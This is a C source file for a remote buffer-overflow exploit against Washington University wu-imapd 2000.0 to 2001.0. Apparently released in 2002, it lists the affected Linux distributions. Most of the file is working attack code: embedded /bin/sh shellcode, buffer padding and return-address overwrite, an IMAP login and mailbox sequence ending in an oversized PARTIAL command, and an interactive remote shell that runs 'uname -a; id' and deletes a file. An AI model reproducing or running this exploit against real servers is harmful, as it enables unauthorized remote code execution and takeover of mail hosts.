/*
**
** Wu-IMAPd Partial Mailbox Attribute Remote Buffer Overflow Exploit
**                                                      by Xpl017Elz
** __
** Vulnerable -
**
** Washington University wu-imapd 2000.0 c
**	+ Conectiva Linux 6.0
**	+ Conectiva Linux 7.0
**	+ Conectiva Linux 8.0
**	+ EnGarde Secure Linux 1.0.1
** Washington University wu-imapd 2000.0 b
**	+ MandrakeSoft Corporate Server 1.0.1
**	+ MandrakeSoft Linux Mandrake 7.1
**	+ MandrakeSoft Linux Mandrake 7.2
**	+ MandrakeSoft Linux Mandrake 8.0
**	+ MandrakeSoft Linux Mandrake 8.0 ppc
**	+ MandrakeSoft Linux Mandrake 8.1
**	+ MandrakeSoft Linux Mandrake 8.1 ia64
**	+ MandrakeSoft Linux Mandrake 8.2
** Washington University wu-imapd 2000.0 a
** Washington University wu-imapd 2000.0
**	+ Caldera OpenLinux Server 3.1
**	+ Caldera OpenLinux Server 3.1.1
**	+ Caldera OpenLinux Workstation 3.1
**	+ Caldera OpenLinux Workstation 3.1.1
** Washington University wu-imapd 2001.0 a
**	+ HP Secure OS software for Linux 1.0
**	+ RedHat Linux 6.2 alpha
**	+ RedHat Linux 6.2 i386
**	+ RedHat Linux 6.2 sparc
**	+ RedHat Linux 7.0 alpha
**	+ RedHat Linux 7.0 i386
**	+ RedHat Linux 7.1 alpha
**	+ RedHat Linux 7.1 i386
**	+ RedHat Linux 7.1 ia64
**	+ RedHat Linux 7.2 i386
**	+ RedHat Linux 7.2 ia64
**	+ Trustix Secure Linux 1.1
**	+ Trustix Secure Linux 1.2
**	+ Trustix Secure Linux 1.5
** Washington University wu-imapd 2001.0 
** __
**			 f. 06/10/2002 s. write messages.
** __
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>. 
** My World: http://x82.i21c.net
**
** Special Greets: INetCop Security, Marcell Fodor(g00d Advisory).
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>

#define Xpl017Elz x82 (lol~)
#define USER "x82"
#define PASS "Xpl017Elz"
#define HOST "localhost"

char shellcode[] = 	/* C00l Ohhara c0de */
"\xeb\x38" 		/* jmp 0x38 */
"\x5e" 			/* popl %esi */
"\x80\x46\x01\x50" 	/* addb $0x50,0x1(%esi) */
"\x80\x46\x02\x50" 	/* addb $0x50,0x2(%esi) */
"\x80\x46\x03\x50" 	/* addb $0x50,0x3(%esi) */
"\x80\x46\x05\x50" 	/* addb $0x50,0x5(%esi) */
"\x80\x46\x06\x50" 	/* addb $0x50,0x6(%esi) */
"\x89\xf0" 		/* movl %esi,%eax */
"\x83\xc0\x08" 		/* addl $0x8,%eax */
"\x89\x46\x08" 		/* movl %eax,0x8(%esi) */
"\x31\xc0" 		/* xorl %eax,%eax */
"\x88\x46\x07" 		/* movb %eax,0x7(%esi) */
"\x89\x46\x0c" 		/* movl %eax,0xc(%esi) */
"\xb0\x0b" 		/* movb $0xb,%al */
"\x89\xf3" 		/* movl %esi,%ebx */
"\x8d\x4e\x08" 		/* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c" 		/* leal 0xc(%esi),%edx */
"\xcd\x80" 		/* int $0x80 */
"\x31\xdb" 		/* xorl %ebx,%ebx */
"\x89\xd8" 		/* movl %ebx,%eax */
"\x40" 			/* inc %eax */
"\xcd\x80" 		/* int $0x80 */
"\xe8\xc3\xff\xff\xff" 	/* call -0x3d */
"\x2f\x12\x19\x1e\x2f\x23\x18"; 
			/* .string "/bin/sh" */

int setsock(char *hostname, int port);
int usage(char *argx);
void shell(int socks);

int setsock(char *hostname, int port) {
    
    int sock;
    struct hostent *he;
    struct sockaddr_in x82_addr;
    
    if((he = gethostbyname(hostname)) == NULL) {
	
	herror("gethostbyname");
	exit(1);
	
    }

    if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
	
	perror("socket");
	exit(1);
	
    }
    
    x82_addr.sin_family = AF_INET;
    x82_addr.sin_port = htons(port);
    x82_addr.sin_addr = *((struct in_addr *)he->h_addr);
    bzero(&x82_addr.sin_zero, 8);
    
    if(connect(sock, (struct sockaddr *)&x82_addr,
		sizeof(struct sockaddr)) == -1) {
	
	perror("connect");
	exit(1);

    }
    
    return(sock);

}

int usage(char *argx) {
    
    printf("\n\tUsage: %s -options arguments\n\n", argx);
    printf("\t-h [hostname] - target host\n");
    printf("\t-u [userid]   - imap user id\n");
    printf("\t-p [password] - user password\n");
    printf("\t-s [addr]     - &shellcode addr\n");
    printf("\t-d            - Debugging mode\n\n");
    printf(" Example: %s -h localhost -u x82 -p x82\n\n", argx);
    exit(0);
    
}

void shell(int socks) {
    
    int died;
    char fall_again[1024]; /* Murder Mus1c */
    char *command = "uname -a; id; rm -f ./x82\n";
    fd_set rset;
    
    bzero(&fall_again, 1024);
    printf("\n");
    send(socks, command, strlen(command), 0);
    
    while(1) {
	
	FD_ZERO(&rset);
	FD_SET(socks, &rset);
	FD_SET(STDIN_FILENO, &rset);
	select(socks+1, &rset, NULL, NULL, NULL);
	
	if(FD_ISSET(socks, &rset)) {
	    
	    died = read(socks, fall_again, 1024);
	    if(died <= 0) {
		
		printf("\n [*] Thanks, P00rcode by Xpl017Elz.\n\n");
		exit(0);
		
	    }
	    
	    fall_again[died] = 0;
	    printf("%s", fall_again);
	    
	}
	
	if(FD_ISSET(STDIN_FILENO, &rset)) {
	    
	    died = read(STDIN_FILENO, fall_again, 1024);
	    
	    if(died > 0) {
		
		fall_again[died] = 0;
		write(socks, fall_again, died);
		
	    }
	}
    }
    return;
    
}

int main(int argc, char *argv[]) {
    
    char user[0x82] = USER,
    	 pass[0x82] = PASS,
    	 host[0x82] = HOST,
    	     readbuf[1024], 
    	       atbuf[1064], 
    	     sendbuf[2024];

#define CODE 0xbffff882
	     
    unsigned long shelladdr = CODE;
    int sock, ax82, bx82, cx82, dx82, debug = 0, port = 143;
    
    bzero(&readbuf, 1024);
    bzero(&sendbuf, 2024);
    bzero(&atbuf, 1064);
    
    printf("\n *** WOOoou-IMAPd4 v2000.0~ v2001.0 Remote Exploit ***\n");
    printf("\t\t\t\t\t  by Xpl017Elz\n\n");
    
    while((ax82 = getopt(argc, argv, "h:u:p:s:d")) != EOF) {
	
	switch(ax82) {
	    
	    case 'h':
		
		strncpy(host, optarg, 0x82);
		break;
		
	    case 'u':
		
		strncpy(user, optarg, 0x82);
		break;
		
	    case 'p':
		
		strncpy(pass, optarg, 0x82);
		break;
		
	    case 's':
		
		shelladdr = strtoul(optarg, NULL, 0);
		break;
		
	    case 'd':
		
		debug = 1;
		printf("\n*** OK, Debugging mode ***\n\n");
		break;
		
	    case '?':
		
		usage(argv[0]);
		break;
		
	}
    }
    
    for(bx82 = 0; bx82 < 1024 - strlen(shellcode); bx82++) {

	atbuf[bx82] = 0x41;
	
    }
    
    if(debug) {
	printf("\n*** NOP size: %d ***", 1024 - strlen(shellcode));
	printf("\n*** Shellcode size: %d ***\n\n", strlen(shellcode));
    }
    
    for(cx82 = 0; cx82 < strlen(shellcode); cx82++) {
	
	atbuf[bx82++] = shellcode[cx82];
	
    }
    
    if(debug) {

	printf("___(Shellcode here)___\n");
	snprintf(sendbuf, 2024, "printf \"%s\" | hexdump", atbuf);
	system(sendbuf);
	printf("___(Shellcode  end)___\n\n");
	
	memset(sendbuf, 0, 1024);
	printf("[*] Using Address: %p\n\n", shelladdr);
	printf("[Enter]"); getchar();
	
    }
    
    for(dx82 = 0; dx82 < 0x20; dx82 += 4) {
    /*	Little	Endian	format	*/
    atbuf[bx82++] = (shelladdr&0x000000ff)>> 0;
    atbuf[bx82++] = (shelladdr&0x0000ff00)>> 8;
    atbuf[bx82++] = (shelladdr&0x00ff0000)>>16;
    atbuf[bx82++] = (shelladdr&0xff000000)>>24;
    
    }
    
    sock = setsock(host, port); /* use sock */
    recv(sock, readbuf, 1024, 0); /* Read Banner */
    
    if(strstr(readbuf, "IMAP4") == NULL) {
	
	if(debug) {
	    
	    printf("\n [x] Banner: %s\n", readbuf);
	
	}
	printf(" [-] IMAP version Check.\n\n");
	close(sock);
	exit(0);
    }
    
    if(debug) {
	
	printf("\n [1] Banner: %s\n", readbuf);
	
    }
    memset(readbuf, 0, 1024);
    
    sle2p(debug); /* 1 liked TRUST(C) */
    
    snprintf(sendbuf, 2024, "x0x login %s %s\n", user, pass);
    send(sock, sendbuf, strlen(sendbuf), 0); /* Login */
    memset(sendbuf, 0, 2024);
    recv(sock, readbuf, 1024, 0); 
    
    if(debug) {
	
	printf(" [2] Login: %s\n", readbuf);
	
    }
    printf(" [*] Login Success\n\n");
    memset(readbuf, 0, 1024);
    
    sle2p(debug); /* Downfall listen t0? */
    
    snprintf(sendbuf, 2024, "x82 create x82\n");
    send(sock, sendbuf, strlen(sendbuf), 0); /* Create BOX */
    memset(sendbuf, 0, 2024);
    recv(sock, readbuf, 1024, 0);
    
    if(debug) {
	
	printf(" [3] Create: %s\n", readbuf);
	
    }
    memset(readbuf, 0, 1024);
    
    sle2p(debug); /* 1 liked Murder Mus1c */
    
    snprintf(sendbuf, 2024, "x82 select x82\n");
    send(sock, sendbuf, strlen(sendbuf), 0); /* Select BOX */
    memset(sendbuf, 0, 2024);
    recv(sock, readbuf, 1024, 0);
    
    if(debug) {
	
	printf(" [4] Select: %s\n", readbuf);
	
    }
    memset(readbuf, 0, 1024);
    
    sle2p(debug); /* Fall Again listen t0? */
    
    snprintf(sendbuf, 2024, "x82 append x82 (\\Seen) {4}\nx82!\n");
    send(sock, sendbuf, strlen(sendbuf), 0); /* Append BOX */
    memset(sendbuf, 0, 2024);
    recv(sock, readbuf, 1024, 0);
    
    if(debug) {
	
	printf(" [5] Append: %s\n", readbuf);
	
    }
    memset(readbuf, 0, 1024);
    
    sle2p(debug); /* Kick Bug ! :-p */
    
    snprintf(sendbuf, 2024, "x82 partial 1 body[%s] 1 1\n", atbuf);
    send(sock, sendbuf, strlen(sendbuf), 0); /* Partial Command */ 
    memset(sendbuf, 0, 2024);
    recv(sock, readbuf, 1024, 0);
    
    if(debug) {
	
	printf(" [6] Partial: %s\n", readbuf);
	
    }
    memset(readbuf, 0, 1024);
    
    sle2p(debug); /* Waiting, Get UserShell ... */
    
    snprintf(sendbuf, 2024, "x0x logout\n"); /* Logout */
    send(sock, sendbuf, strlen(sendbuf), 0);
    memset(sendbuf, 0, 2024);
    recv(sock, readbuf, 1024, 0);
    
    if(debug) {
	
	printf(" [7] Logout: %s\n", readbuf);
	
    }
    printf(" [*] Logout\n\n");
    memset(readbuf, 0, 1024);
    
    sle2p(debug); /* Ending Sploit */

    if(debug) {
	
	printf("\n\n *** It's UserShell. :-) ***\n\n");
	
    }
    
    /* hehe */ stor2(); /* my messages */
    shell(sock);
    
}

sle2p(int debug) {
    
    if(debug) {
	
	sleep(1); // Debugging mode
	
    }
}

stor2() {
    
    printf("\n*** Xpl017Elz has joined #WoWHacker\n");
    printf("<Xpl017Elz> vangelis// hi\n");
    printf("<Xpl017Elz> I saved good music some. It gathered by album.\n");
    printf("<Xpl017Elz> Raised here: http://x82.i21c.net/\n");
    printf("<Xpl017Elz> [Mus1c] <- here.\n");
    printf("*** Xpl017Elz is now known as x82\n");
    printf("<x82> Thank you for worrying always me.\n");
    printf("*** x82 has quit IRC (Understand thing which do not English.)\n\n");
    
}